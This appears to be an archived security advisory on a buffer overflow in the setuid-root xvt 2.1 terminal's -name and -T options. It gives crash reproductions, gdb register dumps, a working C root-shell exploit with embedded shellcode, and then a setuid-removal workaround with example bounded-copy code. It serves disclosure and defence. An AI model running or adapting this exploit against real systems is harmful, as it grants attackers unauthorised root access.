COMMAND

    xvt

SYSTEMS AFFECTED

    xvt 2.1

PROBLEM

    Christophe Bailleux found the following. xvt is an X terminal
    emulator that is designed to be more or less compatible with xterm
    while using much less swap space. It is mainly intended for use
    at sites which use large numbers of X terminals but may also be
    useful on single workstations that are short of memory. The main
    way that xvt achieves its small size is by avoiding the use of
    the X toolkit.

    After the security advisory about rxvt by Samuel Dralet, Christophe
    discovered that xvt has some possible buffer overrun conditions
    related to passing large arguments to xvt's -T and -name command
    line options. Since xvt is installed setuid root by default, it
    was possible for a normal user to pass carefully-crafted arguments
    to xvt such that xvt executed a root shell.

    The Debian Security Team has been informed, since this was tested on
    Debian.

        $ ls -l /usr/bin/X11/xvt
        -rwsr-xr-x    1 root     root        50288 Mar 26  2000 /usr/bin/X11/xvt

        $ xvt -V
        xvt version 2.1


        A)      xvt -name <buffer>
        
        $ xvt -name `perl -e 'print "A"x234'`
        Segmentation fault (core dumped)
        $
        
        tshaw:~$ gdb --core core
        GNU gdb 5.0
        <snip>
        Core was generated by `xvt -name
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x41414141 in ?? ()
        (gdb)
        
        
        B)      xvt -T <buffer>
        
        $ xvt -T `perl -e 'print "A"x262'`
        Segmentation fault (core dumped)
        $
        
        $ gdb --core core
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        <snip>
        Core was generated by `xvt -T
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x804b043 in ?? ()
        (gdb) where
        #0  0x804b043 in ?? ()
        #1  0x804c075 in ?? ()
        #2  0x804b4f6 in ?? ()
        #3  0x804a19c in ?? ()
        (gdb) info reg
        eax            0x8004100        134234368
        ecx            0xffffffff       -1
        edx            0x805524f        134566479
        ebx            0x8055148        134566216
        esp            0xbfffdea0       0xbfffdea0
        ebp            0xbfffdeac       0xbfffdeac
        esi            0x8004141        134234433
        edi            0x8004141        134234433
        eip            0x804b043        0x804b043
        eflags         0x10246  66118
        cs             0x23     35
        ss             0x2b     43
        ds             0x2b     43
        es             0x2b     43
        fs             0x2b     43
        gs             0x2b     43
        fctrl          0x0      0
        fstat          0x0      0
        ftag           0x0      0
        fiseg          0x0      0
        fioff          0x0      0
        foseg          0x0      0
        fooff          0x0      0
        fop            0x0      0
        (gdb)

    Exploit:

    /*
    
       /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
    
       tshaw:~$ ./expl
       bash#
    
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>     /* memset, memcpy, strlen */
    #include <unistd.h>     /* execl */
    
    int main()
    {
        char buf[235];      /* 234 payload bytes plus the terminating NUL */
        int i;
    
        char code[] =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
        for(i=0; i<76; i++)
            buf[i] = 0x41;
    
        *(long *)&buf[76]=0xbffffab0; /* ret addr */
    
        /* fill the rest of the 234 bytes (offsets 80..233) with NOPs;
           the original wrote 234 bytes here and overran buf itself */
        memset(buf + 80, 0x90, 234 - 80);
        memcpy(buf + 233 - strlen(code), code, strlen(code));
    
        buf[234] = '\0';
    
        execl("/usr/bin/X11/xvt", "xvt", "-name", buf, (char *)0);
        return 1;           /* only reached if execl fails */
    }

SOLUTION

    The workaround is to strip the setuid bit: chmod u-s /usr/bin/X11/xvt.
    Afterwards, ls -l /usr/bin/X11/xvt should show -rwxr-xr-x instead of
    -rwsr-xr-x, so a crash in argument handling no longer runs as root.
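    Removing the setuid bit limits the damage; the code-level fix for an
    overrun like this is to bound the copy of the option value. The following
    is an added illustration, not xvt's code: the field size OPT_MAX, the
    struct and the function names are assumptions, and an overlong -name or
    -T value is refused rather than written past the end of a fixed buffer.

```c
#include <stdlib.h>
#include <string.h>

#define OPT_MAX 64  /* assumed field size; xvt's real sizes are not on the page */
struct xopts {
    char name[OPT_MAX];   /* value of -name */
    char title[OPT_MAX];  /* value of -T    */
};

/* Copy an option value only if it fits together with its NUL; otherwise
 * refuse and leave dst untouched instead of running past the array. */
static int copy_opt(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Parse argv into o. Returns 0 on success, -1 on a missing or overlong
 * value. Options other than -name and -T are skipped for brevity. */
int parse_xopts(int argc, char **argv, struct xopts *o)
{
    int i;
    memset(o, 0, sizeof *o);
    for (i = 1; i < argc; i++) {
        char *dst = strcmp(argv[i], "-name") == 0 ? o->name
                  : strcmp(argv[i], "-T") == 0 ? o->title : NULL;
        if (dst == NULL) continue;
        if (i + 1 >= argc || copy_opt(dst, OPT_MAX, argv[++i]) != 0)
            return -1;
    }
    return 0;
}

/* Feed a run of 'A' of the given length (constructed like the crash input
 * above) through the named option; returns parse_xopts's result. */
int try_opt(const char *opt, size_t len)
{
    char *val = malloc(len + 1), *argv[4];
    struct xopts o;
    int rc;
    if (val == NULL) return -1;
    memset(val, 'A', len);
    val[len] = '\0';
    argv[0] = "xvt"; argv[1] = (char *)opt; argv[2] = val; argv[3] = NULL;
    rc = parse_xopts(3, argv, &o);
    free(val);
    return rc;
}
```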